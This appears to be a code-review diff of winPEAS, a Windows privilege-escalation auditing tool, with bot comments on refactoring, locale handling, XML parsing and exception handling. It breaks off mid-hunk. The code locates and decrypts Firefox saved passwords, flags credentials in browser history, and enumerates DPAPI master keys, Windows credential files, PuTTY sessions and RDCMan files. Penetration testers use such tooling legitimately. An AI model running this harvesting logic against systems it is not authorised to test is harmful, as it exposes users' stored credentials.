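Review bot: The history listing added in the `@@ -77,8 +78,11 @@` hunk hard-codes `int limit = 50;`, and the same four lines are repeated in the Firefox (`@@ -56,21 +56,26 @@`) and Internet Explorer (`@@ -69,8 +69,15 @@`) sections of this commit. A single shared constant, for example `const int HistoryPrintLimit = 50;` on the common browser class, would keep the three outputs in step. `history.Take(limit)` also returns the first entries in whatever order the parser produced them, which is not necessarily the most recent ones (the parser is outside this hunk), so a one-line comment stating the ordering would help whoever reads the report. The block also prints the URLs without the `colorsB` highlighting, so entries flagged just above reappear unmarked. The enclosing method starts outside the hunk.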
||||
@@ -1,10 +1,4 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
{
|
||||
class FFLogins
|
||||
{
|
||||
|
||||
@@ -4,11 +4,11 @@ using System.Data;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Web.Script.Serialization;
|
||||
using winPEAS._3rdParty.SQLite;
|
||||
using winPEAS.Checks;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.KnownFileCreds.Browsers.Models;
|
||||
using winPEAS._3rdParty.SQLite;
|
||||
using System.Web.Script.Serialization;
|
||||
|
||||
namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
{
|
||||
@@ -29,7 +29,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
{
|
||||
Beaprint.MainPrint("Looking for Firefox DBs");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
|
||||
List<string> firefoxDBs = Firefox.GetFirefoxDbs();
|
||||
List<string> firefoxDBs = GetFirefoxDbs();
|
||||
if (firefoxDBs.Count > 0)
|
||||
{
|
||||
foreach (string firefoxDB in firefoxDBs) //No Beaprints because line needs red
|
||||
@@ -56,21 +56,26 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
{
|
||||
Beaprint.MainPrint("Looking for GET credentials in Firefox history");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
|
||||
List<string> firefoxHist = Firefox.GetFirefoxHistory();
|
||||
if (firefoxHist.Count > 0)
|
||||
List<string> history = GetFirefoxHistory();
|
||||
if (history.Count > 0)
|
||||
{
|
||||
Dictionary<string, string> colorsB = new Dictionary<string, string>()
|
||||
{
|
||||
{ Globals.PrintCredStrings, Beaprint.ansi_color_bad },
|
||||
};
|
||||
|
||||
foreach (string url in firefoxHist)
|
||||
foreach (string url in history)
|
||||
{
|
||||
if (MyUtils.ContainsAnyRegex(url.ToUpper(), Browser.CredStringsRegex))
|
||||
{
|
||||
Beaprint.AnsiPrint(" " + url, colorsB);
|
||||
}
|
||||
}
|
||||
Console.WriteLine();
|
||||
|
||||
int limit = 50;
|
||||
Beaprint.MainPrint($"Firefox history -- limit {limit}\n");
|
||||
Beaprint.ListPrint(history.Take(limit).ToList());
|
||||
}
|
||||
else
|
||||
{
|
||||
@@ -101,7 +106,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
|
||||
{
|
||||
string userFirefoxBasePath = $"{dir}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\";
|
||||
if (System.IO.Directory.Exists(userFirefoxBasePath))
|
||||
if (Directory.Exists(userFirefoxBasePath))
|
||||
{
|
||||
var directories = Directory.EnumerateDirectories(userFirefoxBasePath);
|
||||
foreach (string directory in directories)
|
||||
@@ -248,6 +253,8 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
}
|
||||
|
||||
foreach (string dir in dirs)
|
||||
{
|
||||
if (Directory.Exists(dir))
|
||||
{
|
||||
string[] files = Directory.EnumerateFiles(dir, "signons.sqlite").ToArray();
|
||||
if (files.Length > 0)
|
||||
@@ -269,6 +276,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
FFDecryptor.NSS_Init(dir);
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
@@ -313,8 +321,8 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
|
||||
foreach (Browsers.Firefox.LoginData loginData in ffLoginData.logins)
|
||||
{
|
||||
string username = Browsers.Firefox.FFDecryptor.Decrypt(loginData.encryptedUsername);
|
||||
string password = Browsers.Firefox.FFDecryptor.Decrypt(loginData.encryptedPassword);
|
||||
string username = FFDecryptor.Decrypt(loginData.encryptedUsername);
|
||||
string password = FFDecryptor.Decrypt(loginData.encryptedPassword);
|
||||
logins.Add(new CredentialModel
|
||||
{
|
||||
Username = username,
|
||||
|
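Review bot: `url.ToUpper()` in the `@@ -56,21 +56,26 @@` hunk is culture-sensitive, so the result of `MyUtils.ContainsAnyRegex(url.ToUpper(), Browser.CredStringsRegex)` depends on the locale of the host being audited. Under a Turkish locale, for example, `i` upper-cases to `İ`, and any pattern in `CredStringsRegex` (defined elsewhere) that contains an ASCII `I` would then not match. `url.ToUpperInvariant()` makes the match locale-independent. If the Chrome and Internet Explorer loops use the same call (those lines are outside their visible hunks), they need the same change. The enclosing method starts outside the hunk.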
||||
@@ -1,11 +1,11 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text.RegularExpressions;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Checks;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
@@ -30,7 +30,7 @@ namespace winPEAS.KnownFileCreds.Browsers
|
||||
{
|
||||
Beaprint.MainPrint("Current IE tabs");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
|
||||
List<string> urls = InternetExplorer.GetCurrentIETabs();
|
||||
List<string> urls = GetCurrentIETabs();
|
||||
|
||||
Dictionary<string, string> colorsB = new Dictionary<string, string>()
|
||||
{
|
||||
@@ -51,9 +51,9 @@ namespace winPEAS.KnownFileCreds.Browsers
|
||||
{
|
||||
Beaprint.MainPrint("Looking for GET credentials in IE history");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
|
||||
Dictionary<string, List<string>> chromeHistBook = InternetExplorer.GetIEHistFav();
|
||||
List<string> history = chromeHistBook["history"];
|
||||
List<string> favorites = chromeHistBook["favorites"];
|
||||
Dictionary<string, List<string>> ieHistoryBook = GetIEHistFav();
|
||||
List<string> history = ieHistoryBook["history"];
|
||||
List<string> favorites = ieHistoryBook["favorites"];
|
||||
|
||||
if (history.Count > 0)
|
||||
{
|
||||
@@ -69,8 +69,15 @@ namespace winPEAS.KnownFileCreds.Browsers
|
||||
Beaprint.AnsiPrint(" " + url, colorsB);
|
||||
}
|
||||
}
|
||||
|
||||
Console.WriteLine();
|
||||
|
||||
int limit = 50;
|
||||
Beaprint.MainPrint($"IE history -- limit {limit}\n");
|
||||
Beaprint.ListPrint(history.Take(limit).ToList());
|
||||
}
|
||||
else
|
||||
{
|
||||
Beaprint.NotFoundPrint();
|
||||
}
|
||||
|
||||
Beaprint.MainPrint("IE favorites");
|
||||
@@ -91,7 +98,7 @@ namespace winPEAS.KnownFileCreds.Browsers
|
||||
{ "favorites", new List<string>() },
|
||||
};
|
||||
|
||||
DateTime startTime = System.DateTime.Now.AddDays(-lastDays);
|
||||
DateTime startTime = DateTime.Now.AddDays(-lastDays);
|
||||
|
||||
try
|
||||
{
|
||||
@@ -166,24 +173,15 @@ namespace winPEAS.KnownFileCreds.Browsers
|
||||
if ((settings != null) && (settings.Count != 0))
|
||||
{
|
||||
foreach (KeyValuePair<string, object> kvp in settings)
|
||||
{
|
||||
byte[] timeBytes = RegistryHelper.GetRegValueBytes("HKCU", "SOFTWARE\\Microsoft\\Internet Explorer\\TypedURLsTime", kvp.Key.ToString().Trim());
|
||||
if (timeBytes != null)
|
||||
{
|
||||
long timeLong = (long)(BitConverter.ToInt64(timeBytes, 0));
|
||||
DateTime urlTime = DateTime.FromFileTime(timeLong);
|
||||
if (urlTime > startTime)
|
||||
{
|
||||
results["history"].Add(kvp.Value.ToString().Trim());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
string userIEBookmarkPath = string.Format("{0}\\Favorites\\", System.Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
|
||||
string userIEBookmarkPath = string.Format("{0}\\Favorites\\", Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
if (Directory.Exists(userIEBookmarkPath))
|
||||
{
|
||||
string[] bookmarkPaths = Directory.EnumerateFiles(userIEBookmarkPath, "*.url", SearchOption.AllDirectories).ToArray();
|
||||
|
||||
foreach (string bookmarkPath in bookmarkPaths)
|
||||
{
|
||||
using (StreamReader rdr = new StreamReader(bookmarkPath))
|
||||
@@ -204,6 +202,7 @@ namespace winPEAS.KnownFileCreds.Browsers
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
Beaprint.GrayPrint(string.Format(" [X] Exception: {0}", ex));
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
@@ -6,7 +7,6 @@ using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using System.Text.RegularExpressions;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
|
||||
@@ -123,7 +123,7 @@ namespace winPEAS.KnownFileCreds
|
||||
// parses recent file shortcuts via COM
|
||||
List<Dictionary<string, string>> results = new List<Dictionary<string, string>>();
|
||||
int lastDays = 7;
|
||||
DateTime startTime = System.DateTime.Now.AddDays(-lastDays);
|
||||
DateTime startTime = DateTime.Now.AddDays(-lastDays);
|
||||
|
||||
try
|
||||
{
|
||||
@@ -144,6 +144,8 @@ namespace winPEAS.KnownFileCreds
|
||||
{
|
||||
string recentPath = string.Format("{0}\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", dir);
|
||||
try
|
||||
{
|
||||
if (Directory.Exists(recentPath))
|
||||
{
|
||||
string[] recentFiles = Directory.EnumerateFiles(recentPath, "*.lnk", SearchOption.AllDirectories).ToArray();
|
||||
|
||||
@@ -152,7 +154,7 @@ namespace winPEAS.KnownFileCreds
|
||||
Console.WriteLine(" {0} :\r\n", userName);
|
||||
foreach (string recentFile in recentFiles)
|
||||
{
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(recentFile);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(recentFile);
|
||||
|
||||
if (lastAccessed > startTime)
|
||||
{
|
||||
@@ -174,14 +176,16 @@ namespace winPEAS.KnownFileCreds
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch { }
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
string recentPath = string.Format("{0}\\Microsoft\\Windows\\Recent\\", System.Environment.GetEnvironmentVariable("APPDATA"));
|
||||
|
||||
string recentPath = string.Format("{0}\\Microsoft\\Windows\\Recent\\", Environment.GetEnvironmentVariable("APPDATA"));
|
||||
if (Directory.Exists(recentPath))
|
||||
{
|
||||
var recentFiles = Directory.EnumerateFiles(recentPath, "*.lnk", SearchOption.AllDirectories);
|
||||
|
||||
foreach (string recentFile in recentFiles)
|
||||
@@ -190,7 +194,7 @@ namespace winPEAS.KnownFileCreds
|
||||
//WshShell shell = new WshShell();
|
||||
//IWshShortcut shortcut = (IWshShortcut)shell.CreateShortcut(recentFile);
|
||||
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(recentFile);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(recentFile);
|
||||
|
||||
if (lastAccessed > startTime)
|
||||
{
|
||||
@@ -210,6 +214,7 @@ namespace winPEAS.KnownFileCreds
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
// release the WshShell COM object
|
||||
Marshal.ReleaseComObject(shellObj);
|
||||
shellObj = null;
|
||||
@@ -237,13 +242,15 @@ namespace winPEAS.KnownFileCreds
|
||||
string userName = parts[parts.Length - 1];
|
||||
if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
|
||||
{
|
||||
List<string> userDPAPIBasePaths = new List<string>();
|
||||
userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
|
||||
userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
|
||||
List<string> userDPAPIBasePaths = new List<string>
|
||||
{
|
||||
string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE")),
|
||||
string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE"))
|
||||
};
|
||||
|
||||
foreach (string userDPAPIBasePath in userDPAPIBasePaths)
|
||||
{
|
||||
if (System.IO.Directory.Exists(userDPAPIBasePath))
|
||||
if (Directory.Exists(userDPAPIBasePath))
|
||||
{
|
||||
var directories = Directory.EnumerateDirectories(userDPAPIBasePath);
|
||||
foreach (string directory in directories)
|
||||
@@ -254,9 +261,9 @@ namespace winPEAS.KnownFileCreds
|
||||
{
|
||||
if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
|
||||
{
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
|
||||
string fileName = System.IO.Path.GetFileName(file);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(file);
|
||||
DateTime lastModified = File.GetLastWriteTime(file);
|
||||
string fileName = Path.GetFileName(file);
|
||||
results.Add(new Dictionary<string, string>()
|
||||
{
|
||||
{ "MasterKey", file },
|
||||
@@ -274,13 +281,15 @@ namespace winPEAS.KnownFileCreds
|
||||
else
|
||||
{
|
||||
string userName = Environment.GetEnvironmentVariable("USERNAME");
|
||||
List<string> userDPAPIBasePaths = new List<string>();
|
||||
userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
|
||||
userDPAPIBasePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
|
||||
List<string> userDPAPIBasePaths = new List<string>
|
||||
{
|
||||
string.Format("{0}\\AppData\\Roaming\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE")),
|
||||
string.Format("{0}\\AppData\\Local\\Microsoft\\Protect\\", Environment.GetEnvironmentVariable("USERPROFILE"))
|
||||
};
|
||||
|
||||
foreach (string userDPAPIBasePath in userDPAPIBasePaths)
|
||||
{
|
||||
if (System.IO.Directory.Exists(userDPAPIBasePath))
|
||||
if (Directory.Exists(userDPAPIBasePath))
|
||||
{
|
||||
var directories = Directory.EnumerateDirectories(userDPAPIBasePath);
|
||||
foreach (string directory in directories)
|
||||
@@ -291,9 +300,9 @@ namespace winPEAS.KnownFileCreds
|
||||
{
|
||||
if (Regex.IsMatch(file, @"[0-9A-Fa-f]{8}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{4}[-][0-9A-Fa-f]{12}"))
|
||||
{
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
|
||||
string fileName = System.IO.Path.GetFileName(file);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(file);
|
||||
DateTime lastModified = File.GetLastWriteTime(file);
|
||||
string fileName = Path.GetFileName(file);
|
||||
results.Add(new Dictionary<string, string>()
|
||||
{
|
||||
{ "MasterKey", file },
|
||||
@@ -331,23 +340,25 @@ namespace winPEAS.KnownFileCreds
|
||||
string userName = parts[parts.Length - 1];
|
||||
if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
|
||||
{
|
||||
List<string> userCredFilePaths = new List<string>();
|
||||
userCredFilePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir));
|
||||
userCredFilePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", dir));
|
||||
List<string> userCredFilePaths = new List<string>
|
||||
{
|
||||
string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", dir),
|
||||
string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", dir)
|
||||
};
|
||||
|
||||
foreach (string userCredFilePath in userCredFilePaths)
|
||||
{
|
||||
if (System.IO.Directory.Exists(userCredFilePath))
|
||||
if (Directory.Exists(userCredFilePath))
|
||||
{
|
||||
var systemFiles = Directory.EnumerateFiles(userCredFilePath);
|
||||
if ((systemFiles != null))
|
||||
{
|
||||
foreach (string file in systemFiles)
|
||||
{
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
|
||||
long size = new System.IO.FileInfo(file).Length;
|
||||
string fileName = System.IO.Path.GetFileName(file);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(file);
|
||||
DateTime lastModified = File.GetLastWriteTime(file);
|
||||
long size = new FileInfo(file).Length;
|
||||
string fileName = Path.GetFileName(file);
|
||||
|
||||
// jankily parse the bytes to extract the credential type and master key GUID
|
||||
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
|
||||
@@ -381,15 +392,17 @@ namespace winPEAS.KnownFileCreds
|
||||
}
|
||||
|
||||
string systemFolder = string.Format("{0}\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Credentials", Environment.GetEnvironmentVariable("SystemRoot"));
|
||||
if (Directory.Exists(systemFolder))
|
||||
{
|
||||
var files = Directory.EnumerateFiles(systemFolder);
|
||||
if ((files != null))
|
||||
{
|
||||
foreach (string file in files)
|
||||
{
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(file);
|
||||
DateTime lastModified = File.GetLastWriteTime(file);
|
||||
long size = new System.IO.FileInfo(file).Length;
|
||||
string fileName = System.IO.Path.GetFileName(file);
|
||||
string fileName = Path.GetFileName(file);
|
||||
|
||||
// jankily parse the bytes to extract the credential type and master key GUID
|
||||
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
|
||||
@@ -418,12 +431,15 @@ namespace winPEAS.KnownFileCreds
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
string userName = Environment.GetEnvironmentVariable("USERNAME");
|
||||
List<string> userCredFilePaths = new List<string>();
|
||||
userCredFilePaths.Add(string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
|
||||
userCredFilePaths.Add(string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", System.Environment.GetEnvironmentVariable("USERPROFILE")));
|
||||
List<string> userCredFilePaths = new List<string>
|
||||
{
|
||||
string.Format("{0}\\AppData\\Local\\Microsoft\\Credentials\\", Environment.GetEnvironmentVariable("USERPROFILE")),
|
||||
string.Format("{0}\\AppData\\Roaming\\Microsoft\\Credentials\\", Environment.GetEnvironmentVariable("USERPROFILE"))
|
||||
};
|
||||
|
||||
foreach (string userCredFilePath in userCredFilePaths)
|
||||
{
|
||||
@@ -433,10 +449,10 @@ namespace winPEAS.KnownFileCreds
|
||||
|
||||
foreach (string file in files)
|
||||
{
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(file);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(file);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(file);
|
||||
DateTime lastModified = File.GetLastWriteTime(file);
|
||||
long size = new System.IO.FileInfo(file).Length;
|
||||
string fileName = System.IO.Path.GetFileName(file);
|
||||
string fileName = Path.GetFileName(file);
|
||||
|
||||
// jankily parse the bytes to extract the credential type and master key GUID
|
||||
// reference- https://github.com/gentilkiwi/mimikatz/blob/3d8be22fff9f7222f9590aa007629e18300cf643/modules/kull_m_dpapi.h#L24-L54
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
|
||||
@@ -20,7 +20,7 @@ namespace winPEAS.KnownFileCreds
|
||||
try
|
||||
{
|
||||
Beaprint.MainPrint("Putty Sessions");
|
||||
List<Dictionary<string, string>> putty_sess = Putty.GetPuttySessions();
|
||||
List<Dictionary<string, string>> putty_sess = GetPuttySessions();
|
||||
|
||||
Dictionary<string, string> colorF = new Dictionary<string, string>()
|
||||
{
|
||||
@@ -39,7 +39,7 @@ namespace winPEAS.KnownFileCreds
|
||||
try
|
||||
{
|
||||
Beaprint.MainPrint("Putty SSH Host keys");
|
||||
List<Dictionary<string, string>> putty_sess = Putty.ListPuttySSHHostKeys();
|
||||
List<Dictionary<string, string>> putty_sess = ListPuttySSHHostKeys();
|
||||
Dictionary<string, string> colorF = new Dictionary<string, string>()
|
||||
{
|
||||
{ ".*", Beaprint.ansi_color_bad },
|
||||
@@ -182,8 +182,10 @@ namespace winPEAS.KnownFileCreds
|
||||
Dictionary<string, object> hostKeys = RegistryHelper.GetRegValues("HKU", string.Format("{0}\\Software\\SimonTatham\\PuTTY\\SshHostKeys\\", SID));
|
||||
if ((hostKeys != null) && (hostKeys.Count != 0))
|
||||
{
|
||||
Dictionary<string, string> putty_ssh = new Dictionary<string, string>();
|
||||
putty_ssh["UserSID"] = SID;
|
||||
Dictionary<string, string> putty_ssh = new Dictionary<string, string>
|
||||
{
|
||||
["UserSID"] = SID
|
||||
};
|
||||
foreach (KeyValuePair<string, object> kvp in hostKeys)
|
||||
{
|
||||
putty_ssh[kvp.Key] = ""; //Looks like only matters the key name, not the value
|
||||
|
||||
@@ -1,8 +1,8 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Xml;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
|
||||
@@ -77,7 +77,7 @@ namespace winPEAS.KnownFileCreds
|
||||
if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
|
||||
{
|
||||
string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", dir);
|
||||
if (System.IO.File.Exists(userRDManFile))
|
||||
if (File.Exists(userRDManFile))
|
||||
{
|
||||
XmlDocument xmlDoc = new XmlDocument();
|
||||
xmlDoc.Load(userRDManFile);
|
||||
@@ -87,8 +87,8 @@ namespace winPEAS.KnownFileCreds
|
||||
XmlNodeList items = filesToOpen[0].ChildNodes;
|
||||
XmlNode node = items[0];
|
||||
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(userRDManFile);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(userRDManFile);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(userRDManFile);
|
||||
DateTime lastModified = File.GetLastWriteTime(userRDManFile);
|
||||
Dictionary<string, string> rdg = new Dictionary<string, string>(){
|
||||
{ "RDCManFile", userRDManFile },
|
||||
{ "Accessed", string.Format("{0}", lastAccessed) },
|
||||
@@ -107,9 +107,9 @@ namespace winPEAS.KnownFileCreds
|
||||
else
|
||||
{
|
||||
string userName = Environment.GetEnvironmentVariable("USERNAME");
|
||||
string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", System.Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
string userRDManFile = string.Format("{0}\\AppData\\Local\\Microsoft\\Remote Desktop Connection Manager\\RDCMan.settings", Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
|
||||
if (System.IO.File.Exists(userRDManFile))
|
||||
if (File.Exists(userRDManFile))
|
||||
{
|
||||
XmlDocument xmlDoc = new XmlDocument();
|
||||
xmlDoc.Load(userRDManFile);
|
||||
@@ -119,8 +119,8 @@ namespace winPEAS.KnownFileCreds
|
||||
XmlNodeList items = filesToOpen[0].ChildNodes;
|
||||
XmlNode node = items[0];
|
||||
|
||||
DateTime lastAccessed = System.IO.File.GetLastAccessTime(userRDManFile);
|
||||
DateTime lastModified = System.IO.File.GetLastWriteTime(userRDManFile);
|
||||
DateTime lastAccessed = File.GetLastAccessTime(userRDManFile);
|
||||
DateTime lastModified = File.GetLastWriteTime(userRDManFile);
|
||||
Dictionary<string, string> rdg = new Dictionary<string, string>(){
|
||||
{ "RDCManFile", userRDManFile },
|
||||
{ "Accessed", string.Format("{0}", lastAccessed) },
|
||||
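Review bot: `xmlDoc.Load(userRDManFile)` in both the per-user branch and the current-user branch parses an `RDCMan.settings` file that the profile owner controls, using the default `XmlDocument` configuration. On .NET Framework builds earlier than 4.5.2 the default resolver follows DTD and external-entity references, so I would add `xmlDoc.XmlResolver = null;` before each `Load` call; the project's target framework is not visible here, so treat this as hardening to confirm. The next lines, `filesToOpen[0].ChildNodes` and `items[0]`, index without a count check. `filesToOpen` is assigned outside the hunk, so it cannot be seen from here whether an empty or malformed settings file is already handled. The enclosing method starts and ends outside these hunks.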
|
||||
@@ -24,6 +24,8 @@ namespace winPEAS.KnownFileCreds.SuperPutty
|
||||
try
|
||||
{
|
||||
var path = $"{dir}\\Documents\\SuperPuTTY\\";
|
||||
if (Directory.Exists(path))
|
||||
{
|
||||
var files = Directory.EnumerateFiles(path, filter, SearchOption.TopDirectoryOnly);
|
||||
|
||||
foreach (var file in files)
|
||||
@@ -31,6 +33,7 @@ namespace winPEAS.KnownFileCreds.SuperPutty
|
||||
Beaprint.BadPrint($" {file}");
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception)
|
||||
{
|
||||
}
|
||||
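Review bot: The empty `catch (Exception) { }` that closes this block still discards every failure from `Directory.EnumerateFiles`, and the new `Directory.Exists(path)` guard returns false both when the folder is absent and when the current user lacks permission to read it. Someone reading the report therefore cannot tell "no SuperPuTTY files" from "profile not readable". I would narrow the handler to the expected cases, `catch (Exception ex) when (ex is UnauthorizedAccessException || ex is IOException)`, provided nothing upstream relies on all exceptions being swallowed here. I would also add a comment such as `// unreadable profile is skipped; absence of output is not proof that no session files exist`. The method body starts before the first hunk and continues after the second.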
|
||||
@@ -45,16 +45,18 @@ namespace winPEAS.KnownFileCreds.Vault
|
||||
|
||||
// Create dictionary to translate Guids to human readable elements
|
||||
IntPtr guidAddress = vaultGuidPtr;
|
||||
Dictionary<Guid, string> vaultSchema = new Dictionary<Guid, string>();
|
||||
vaultSchema.Add(new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note");
|
||||
vaultSchema.Add(new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential");
|
||||
vaultSchema.Add(new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector");
|
||||
vaultSchema.Add(new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials");
|
||||
vaultSchema.Add(new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials");
|
||||
vaultSchema.Add(new Guid("E69D7838-91B5-4FC9-89D5-230D4D4CC2BC"), "Windows Domain Certificate Credential");
|
||||
vaultSchema.Add(new Guid("3E0E35BE-1B77-43E7-B873-AED901B6275B"), "Windows Domain Password Credential");
|
||||
vaultSchema.Add(new Guid("3C886FF3-2669-4AA2-A8FB-3F6759A77548"), "Windows Extended Credential");
|
||||
vaultSchema.Add(new Guid("00000000-0000-0000-0000-000000000000"), null);
|
||||
Dictionary<Guid, string> vaultSchema = new Dictionary<Guid, string>
|
||||
{
|
||||
{ new Guid("2F1A6504-0641-44CF-8BB5-3612D865F2E5"), "Windows Secure Note" },
|
||||
{ new Guid("3CCD5499-87A8-4B10-A215-608888DD3B55"), "Windows Web Password Credential" },
|
||||
{ new Guid("154E23D0-C644-4E6F-8CE6-5069272F999F"), "Windows Credential Picker Protector" },
|
||||
{ new Guid("4BF4C442-9B8A-41A0-B380-DD4A704DDB28"), "Web Credentials" },
|
||||
{ new Guid("77BC582B-F0A6-4E15-4E80-61736B6F3B29"), "Windows Credentials" },
|
||||
